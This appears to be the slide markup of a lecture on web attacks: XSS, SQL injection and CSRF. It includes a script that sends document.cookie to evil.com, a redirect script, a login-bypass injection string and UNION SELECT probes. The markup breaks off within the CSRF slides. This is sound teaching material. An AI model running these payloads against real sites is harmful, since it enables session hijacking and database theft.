                <a:srgbClr val="D9CBEE"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="C9B5E8"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="7D60A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defTabSz="914400" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP/1.1 200 OK</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;…&lt;/script&gt;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Cross-site scripting (XSS)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85800" y="4419600"/>
            <a:ext cx="7772400" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="1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Attacker injects malicious code into vulnerable web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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Victim visits vulnerable web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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Malicious code is served to victim by web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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Malicious code executes on the victims with web server’s privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38916" name="Picture 4" descr="client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100" y="2387600"/>
            <a:ext cx="88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 descr="attacker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752600"/>
            <a:ext cx="18097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6" descr="vulnerable.pd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302000"/>
            <a:ext cx="18097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919" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2790825" y="2097088"/>
            <a:ext cx="2982913" cy="6048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" name="Round Diagonal Corner Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="2197100"/>
            <a:ext cx="1990725" cy="381000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1990725 w 1990725"/>
              <a:gd name="T1" fmla="*/ 190500 h 381000"/>
              <a:gd name="T2" fmla="*/ 995363 w 1990725"/>
              <a:gd name="T3" fmla="*/ 381000 h 381000"/>
              <a:gd name="T4" fmla="*/ 0 w 1990725"/>
              <a:gd name="T5" fmla="*/ 190500 h 381000"/>
              <a:gd name="T6" fmla="*/ 995363 w 1990725"/>
              <a:gd name="T7" fmla="*/ 0 h 381000"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 1 60000 65536"/>
              <a:gd name="T10" fmla="*/ 2 60000 65536"/>
              <a:gd name="T11" fmla="*/ 3 60000 65536"/>
              <a:gd name="T12" fmla="*/ 18599 w 1990725"/>
              <a:gd name="T13" fmla="*/ 18599 h 381000"/>
              <a:gd name="T14" fmla="*/ 1972126 w 1990725"/>
              <a:gd name="T15" fmla="*/ 362401 h 381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0725" h="381000">
                <a:moveTo>
                  <a:pt x="63501" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1990725" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1990725" y="317499"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1990725" y="352569"/>
                  <a:pt x="1962294" y="380999"/>
                  <a:pt x="1927224" y="381000"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="381000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="63501"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="28430"/>
                  <a:pt x="28430" y="0"/>
                  <a:pt x="63500" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:cu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defTabSz="9144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Trebuchet MS" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Trebuchet MS" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>log?s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Trebuchet MS" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>=01a4b8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types of XSS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i="1" smtClean="0"/>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: vulnerable application simply “reflects” attacker’s code to its visitors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Persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: vulnerable application stores (e.g., in the database) the attacker’s code and presents it to its visitors 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DOM-based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: vulnerable application includes pages that use untrusted parts of their DOM model (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>document.URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>) in an insecure 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XSS attacks: stealing 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000" smtClean="0"/>
              <a:t>Attacker injects script that reads the site’s cookie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/>
              <a:t>Scripts sends the cookie to attacker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smtClean="0"/>
              <a:t>Attacker can now log into the site as the victim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3000" smtClean="0"/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800" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;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800" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>var img = new Image();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800" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>img.src = </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>“http://evil.com/log_cookie.php?” + document.cookie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800" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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XSS attacks: “defacement”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Attacker injects script that automatically redirects victims to attacker’s site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>document.location = </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>    “http://evil.com”;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smtClean="0">
                <a:latin typeface="Courier" charset="0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XSS attacks: phishing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Attacker injects script that reproduces look-and-feel of “interesting” site (e.g., paypal, login page of the site itself)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Fake page asks for user’s credentials or other sensitive information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The data is sent to the attacker’s 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XSS attacks: privacy violation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attacker injects a script that determines the sites the victims has visited in the past</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>This information can be leveraged to perform targeted phishing attacks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XSS attacks: run exploits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attacker injects a script that launches a number of exploits against the user’s browser or its plugins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>If the exploits are successful, malware is installed on the victim’s machine without any user intervention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Often, the victim’s machine becomes part of a botnet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XSS attacks: JavaScript malware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JavaScript opens up internal network to external attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scan internal network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fingerprint devices on the internal network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Abuse default credentials of DSL/wireless </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>routers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injection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74295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charset="0"/>
                          <a:ea typeface="Gill Sans Light" charset="0"/>
                          <a:cs typeface="Gill Sans Light" charset="0"/>
                        </a:rPr>
                        <a:t>HTTP Request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POST /login?u=foo&amp;p=bar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/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685800" y="3133725"/>
          <a:ext cx="7772400" cy="74295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charset="0"/>
                          <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                        </a:rPr>
                        <a:t>SQL Query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Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>SELECT user, pwd FROM users WHERE u = ‘foo’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48137" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="43434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defTabSz="914400">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker submits HTTP request with a malicious parameter value that modifies an existing SQL query, or adds new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>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Key-value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pairs with an equals sign (=) between the key and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the value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>There </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>can be many of them on the URL and they are separated by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ampersands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IN" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>be passed in the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URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IN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en-IN" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>shown in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earlier Example or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>in the body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of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request, as shown later.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Method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Every request to a server is one of several kinds of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methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN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dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>two most common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, by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>far, are GET and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POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN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IN" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>you type a URL into your web browser and hit enter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, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>if you click a link, you’re issuing a GET request. Most of the time that you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click a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>button on a form or do something relatively complex, like uploading an image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, you’re </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>making a POST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request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN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dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>other methods (e.g., PROPFIND, OPTIONS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, PUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, DELETE) are used primarily in a protocol called Distributed Authoring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and Versioning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(DAV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) (Not to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>talk much about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them)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injection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74295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charset="0"/>
                          <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                        </a:rPr>
                        <a:t>HTTP Request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Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>POST /login?u=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Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>‘+OR+1&lt;2#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Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&amp;p=bar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/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685800" y="3133725"/>
          <a:ext cx="7772400" cy="74295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Light" charset="0"/>
                          <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                        </a:rPr>
                        <a:t>SQL Query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Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>SELECT user, pwd FROM users WHERE u = ‘’ OR 1&lt;2#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49161" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="43434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defTabSz="914400">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker submits HTTP request with a malicious parameter value that modifies an existing SQL query, or adds new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SQLI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Detecting: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“Negative approach”: inject special-meaning characters that are likely to cause an error, e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>user=“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“Positive approach”: inject expression and check if it is interpreted, e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>user=ma” “rco</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>user=marco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Consequences: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Violate data integrity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Violate data confidentiality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SQLI attacks: DB structure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messages</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"""' at line 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM authors WHERE name = "””</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Special queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>" union select null,null,null,null,null -- ” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>gives SQL error message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>" union select null,null,null,null,null,null – ” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>gives invalid credential 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Cross-site request forgery (CSRF)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85800" y="4419600"/>
            <a:ext cx="7772400" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350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Victim is logged into vulnerable web site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53252" name="Picture 4" descr="client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100" y="2387600"/>
            <a:ext cx="88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 descr="attacker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752600"/>
            <a:ext cx="18097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6" descr="vulnerable.pd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302000"/>
            <a:ext cx="18097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3255" name="Straight Connector 9"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2805113" y="2909888"/>
            <a:ext cx="2924175" cy="63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Round Diagonal Corner Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="3022600"/>
            <a:ext cx="1905000" cy="558800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1905000 w 1905000"/>
              <a:gd name="T1" fmla="*/ 279400 h 558800"/>
              <a:gd name="T2" fmla="*/ 952500 w 1905000"/>
              <a:gd name="T3" fmla="*/ 558800 h 558800"/>
              <a:gd name="T4" fmla="*/ 0 w 1905000"/>
              <a:gd name="T5" fmla="*/ 279400 h 558800"/>
              <a:gd name="T6" fmla="*/ 952500 w 1905000"/>
              <a:gd name="T7" fmla="*/ 0 h 558800"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 1 60000 65536"/>
              <a:gd name="T10" fmla="*/ 2 60000 65536"/>
              <a:gd name="T11" fmla="*/ 3 60000 65536"/>
              <a:gd name="T12" fmla="*/ 27278 w 1905000"/>
              <a:gd name="T13" fmla="*/ 27278 h 558800"/>
              <a:gd name="T14" fmla="*/ 1877722 w 1905000"/>
              <a:gd name="T15" fmla="*/ 531522 h 558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000" h="558800">
                <a:moveTo>
                  <a:pt x="93135" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1905000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1905000" y="465665"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1905000" y="517102"/>
                  <a:pt x="1863302" y="558799"/>
                  <a:pt x="1811865" y="558800"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="558800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="93135"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="41697"/>
                  <a:pt x="41697" y="0"/>
                  <a:pt x="93134" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="F0EAF9"/>
              </a:gs>
              <a:gs pos="64999">
                <a:srgbClr val="D9CBEE"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="C9B5E8"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="7D60A0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defTabSz="914400" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Trebuchet MS" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>GET /posts</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Trebuchet MS" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Trebuchet MS" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Cookie: s=01a4b8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Cross-site request forgery (CSRF)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685800" y="4419600"/>
            <a:ext cx="7772400" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350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Victim is logged into vulnerable web site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350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Victim visits malicious page on attacker web site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54276" name="Picture 4" descr="client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100" y="2387600"/>
            <a:ext cx="88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5" descr="attacker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752600"/>
            <a:ext cx="18097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6" descr="vulnerable.pd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302000"/>
            <a:ext cx="18097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279" name="Straight Connector 9"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2805113" y="2116138"/>
            <a:ext cx="2924175" cy="793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Round Diagonal Corner Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3165475" y="2266950"/>
            <a:ext cx="1905000" cy="558800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1905000 w 1905000"/>
              <a:gd name="T1" fmla="*/ 279400 h 558800"/>
              <a:gd name="T2" fmla="*/ 952500 w 1905000"/>
              <a:gd name="T3" fmla="*/ 558800 h 558800"/>
              <a:gd name="T4" fmla="*/ 0 w 1905000"/>
              <a:gd name="T5" fmla="*/ 279400 h 558800"/>
              <a:gd name="T6" fmla="*/ 952500 w 1905000"/>
              <a:gd name="T7" fmla="*/ 0 h 558800"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
